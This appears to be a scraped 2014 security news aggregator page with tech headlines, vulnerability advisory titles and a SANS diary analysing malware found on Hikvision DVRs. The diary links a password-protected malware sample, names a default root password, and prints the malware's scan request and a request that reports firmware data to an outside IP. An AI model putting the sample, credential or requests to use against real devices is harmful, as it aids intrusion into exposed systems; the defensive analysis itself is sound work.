Hackin9

Facebook flashes its One Tool To Rule Them All in security threat analysis
Register
The social network's engineers said the utility, imaginatively dubbed ThreatData, collects software nasties shared by researchers and also throws in intelligence gathered by Facebook plus information it buys from infosec firms. Unfortunately, these ...

and more »
 

SANS Institute to Hold Security Leadership Summit in Boston
SYS-CON Media (press release)
SANS offers a myriad of free resources to the InfoSec community including consensus projects, research reports, and newsletters; it also operates the Internet's early warning system—the Internet Storm Center. At the heart of SANS are the many security ...

and more »
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Bing is poised to function like a souped-up Yellow Pages, with visual search results offering more information about professionals such as lawyers and doctors.
 
It's been nearly four years since SAP got into enterprise mobility with the acquisition of Sybase, but many customers still don't quite understand its mobile product strategy, according to a new survey by the Americas' SAP Users' Group.
 
Reports are circulating that Yahoo is looking to launch a video site that would go up against Google's behemoth YouTube.
 
A federal jury in New Jersey has handed a setback to Avaya, ruling that it illegally tried to quash competition for service on its enterprise communications equipment.
 
Intel's US$740 million investment in software company Cloudera will help sell more x86 chips in Hadoop installations, but it could also be a defensive move to maintain its server lead from the emerging threat posed by 64-bit ARM servers.
 
U.S. regulators are opening up spectrum that could allow for Wi-Fi services with speeds of one gigabit per second and faster.
 
Oracle has overtaken rival IBM as the world's second-largest software vendor by pulling in $29.6 billion in software revenue during 2013, according to analyst firm Gartner.
 
The U.S. Supreme Court could wipe out a whole swath of software and business-method patents if justices invalidate four electronic-trading patents, an attorney for patent-owner Alice said.
 
The sun emitted what NASA is calling a "significant" solar flare on Saturday that could affect communications systems on Earth on Wednesday.
 
[SECURITY] [DSA 2891-2] mediawiki regression update
 
Facebook CEO Mark Zuckerberg faced a lot of criticism last week when his company agreed to pay $2 billion for a startup still building its first product, the Rift virtual reality headset.
 
The U.S. government's flagship health insurance exchange website, Healthcare.gov, was temporarily shut down Monday, the deadline for people to sign up for health coverage under the new law.
 
PhonerLite 2.14 SIP Soft Phone - SIP Digest Leak Information Disclosure (CVE-2014-2560)
 
cURL/libcURL CVE-2014-0138 Remote Security Bypass Vulnerability
 
LaCie announced it is releasing a 2TB version of its Fuel wireless hard drive.
 

Security provider RSA endowed its BSAFE cryptography toolkit with a second NSA-influenced random number generator (RNG) that's so weak it makes it easier for eavesdroppers to decrypt protected communications, Reuters reported Monday.

Citing soon-to-be-published research from several universities, Reuters said the Extended Random extension for secure websites allows attackers to work tens of thousands of times faster when breaking cryptography that uses the Dual EC_DRBG algorithm to generate the random numbers that populate a specific cryptographic key. Dual EC_DRBG is a pseudo-random number generator that was developed by cryptographers from the National Security Agency and was the default RNG in BSAFE even after researchers demonstrated weaknesses so severe that many suspected they were introduced intentionally so the US spy agency could exploit them to crack encrypted communications of people it wanted to monitor. In December, Reuters reported that the NSA paid RSA $10 million to give Dual EC_DRBG its favored position in BSAFE.

Extended Random was a second RNG that would presumably make cryptographic keys more robust by adding a second source of randomness. In theory, the additional RNG should increase the entropy used when constructing a new key. In reality, the algorithm made protected communications even easier for attackers to decrypt by reducing the time it takes to predict the random numbers generated by Dual EC_DRBG, which is short for Dual Elliptic Curve, Reuters reported Monday.

Read 2 remaining paragraphs | Comments

 
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. [More Info...]
 
LinuxSecurity.com: New seamonkey packages are available for Slackware 14.0, 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New httpd packages are available for Slackware 14.0, 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New mozilla-firefox packages are available for Slackware 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New mozilla-thunderbird packages are available for Slackware 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New curl packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New mozilla-nss packages are available for Slackware 14.0, 14.1, and -current to fix a security issue. [More Info...]
 
Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
 
ManageEngine OpStor Cross Site Scripting And Privilege Escalation Vulnerabilities
 
SePortal 'sp_id' Parameter SQL Injection Vulnerability
 

Daily Maily אנשים ומחשבים

הפורמט החדש של InfoSec מבוסס על חוכמת ההמונים
Daily Maily אנשים ומחשבים
תחום אבטחת המידע היה מאז ומעולם נושא שהעסיק את אנשי מערכות מידע מהיום שהומצא המחשב. בשנים האחרונות מאז פרוץ הסייבר, עומעם מעט מעמדו של תחום זה, ויחד איתו אלו שממלאים את התפקיד בפועל הם מנהלי האבטחה (CISO). כעת אנחנו מצויים על סף עידן חדש, שבו כולם מבינים כי ...

 
Still building your in-house data analytics operation? External providers can supplement your capabilities -- fast.
 
Encryption is one of the best ways to prevent the type of terrible headaches that many high-profile companies have experienced with stolen data. Even if experienced hackers are able to penetrate a system, having the data encrypted can mean that nothing useful is taken.
 
Under CIO Victor Fetter's leadership at LPL Financial, the IT group has moved from 'working on projects' to delivering solutions that shape the business and the marketplace.
 
Today's executives can boast about their companies' tech prowess, but they also need to keep an eye on archrivals and new competitors, says Maryfran Johnson.
 
IDG Communications CEO Michael Friedenberg offers his take on the latest IDC predictions about retail customers, big data, supply chain and more
 
Don't look now, but your company is losing control. Your marketing brethren are already living with the challenge: Customers are now in the driver's seat.
 

Update: Just found what looks like a bitcoin miner on the infected DVR. There are two more binaries. D72BNr, the bitcoin miner (according to the usage info based on strings) and mzkk8g, which looksl ike a simplar http agent, maybe to download additional tools easily (similar to curl/wget which isn't installed on this DVR by default). I will add these two files to https://isc.sans.edu/diaryimages/hikvision.zip shortly.

Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ).

Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) .

The malware resides in /dev/cmd.so . A number of additional suspect files where located in the /dev directory which we still need to recover / analyze from the test system. The compromisse of the DVR likely happened via an exposed telnet port and a default root password (12345). 

Analysis of the malware is still ongoing, and any help is appreciated (see link to malware above). Here are some initial findings:

- The malware is an ARM binary, indicating that it is targeting devices, not your typical x86 Linux server.
- The malware scans for Synology devices exposed on port 5000. The http request sent by the malware:

GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
- it then extracts the firmware version details and transmits them to 162.219.57.8. The request used for this reporting channel:
 
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
 
So in short, this malware is just scanning for vulnerable devices, and the actual exploit will likely come later.
 
[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
For the next release of its open source MySQL, Oracle is making a number of changes designed to vastly boost the speed of the open source relational database management system.
 
LibYAML 'yaml_parser_scan_uri_escapes()' Function Remote Heap Based Buffer Overflow Vulnerability
 
Symantec LiveUpdate Administrator CVE-2014-1644 Unauthorized Access Vulnerability
 
Symantec LiveUpdate Administrator CVE-2014-1645 SQL Injection Vulnerability
 
Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities
 
Microsoft's new Word for iPad app has cracked the top 10 on Apple's App Store 'Top Grossing' chart.
 
Alibaba Group is investing about $692 million in retail company Intime Retail with the aim of setting up a joint venture that aims to provide linkages between their online and physical retail businesses in China.
 
Fitnesse CVE-2014-1216 Remote Code Execution Vulnerability
 
Siemens SIMATIC S7-1200 CVE-2014-2256 Denial of Service Vulnerability
 
PhotoWIFI Lite v1.0 iOS - Multiple Web Vulnerabilities
 
[SECURITY] [DSA 2891-1] mediawiki security update
 
[SECURITY] [DSA 2890-1] libspring-java security update
 
[slackware-security] seamonkey (SSA:2014-086-07)
 
Siemens SIMATIC S7-1200 CVE-2014-2254 Denial of Service Vulnerability
 
Siemens SIMATIC S7-1200 CVE-2014-2258 Denial of Service Vulnerability_
 
Google said its free DNS (Domain Name System) service is being intercepted by most Turkish ISPs as the country battles users trying to circumvent censorship efforts by the government.
 
Alibaba Group is investing about $692 million in retail company Intime Retail with the aim of setting up a joint venture that aims to provide linkages between their online and physical retail businesses in China.
 
Technology that remotely makes a stolen smartphone useless could save American consumers up to $2.6 billion per year if it is implemented widely and leads to a reduction in theft of phones, according to a new report.
 
One of the two banks suing Target and security vendor Trustwave over responsibility for one the largest data breaches in history has pulled out of the lawsuit.
 
U.S. District Judge Lucy H. Koh on Sunday overruled Samsung Electronics' objections to showing jurors a recent instructional video on how patents work, ahead of a trial in a patent dispute between Apple and Samsung.
 
A group of activists are hoping to appeal a U.S. judge's ruling that treated the censorship on Chinese search engine Baidu as free speech.
 
The latest release of Fedora, nicknamed "Heisenbug," is a step towards making Fedora a player in the mobile arena. Fedora 20 also includes more support for cloud, and this is also the first release that supports cheap, low-power ARM processors as a primary architecture, in addition to Intel and AMD chips.
 
Rep. William Keating (D-Mass.), who sits on the House Cybersecurity, Infrastructure Protection and Security Technologies Subcommittee, is calling on the Department of Homeland Security to be more involved in tackling the cybersecurity problem. Insider (registration required)
 
Linux Kernel 'arch_dup_task_struct()' Function Local Denial of Service Vulnerability
 
Linux Kernel 'drivers/net/wireless/ath/ath9k/xmit.c' Local Denial of Service Vulnerability
 
[slackware-security] mozilla-thunderbird (SSA:2014-086-05)
 
[slackware-security] mozilla-nss (SSA:2014-086-04)
 
[slackware-security] mozilla-firefox (SSA:2014-086-03)
 

SiliconANGLE (blog)

McAfee CSO article stirs up the whitehat infosec community
SiliconANGLE (blog)
medium_2906633775 An article published by Security Magazine online by McAfee Chief Security Officer Brent Conran earlier this month has created a storm of controversy in the infosec community. Posted under the category 'Cyber Safety' and entitled 'Why ...

 
Spring Framework CVE-2014-0054 Multiple XML External Entity Injection Vulnerabilities
 
Spring Framework 'FormTag.java' Cross Site Scripting Vulnerability
 
Internet Storm Center Infocon Status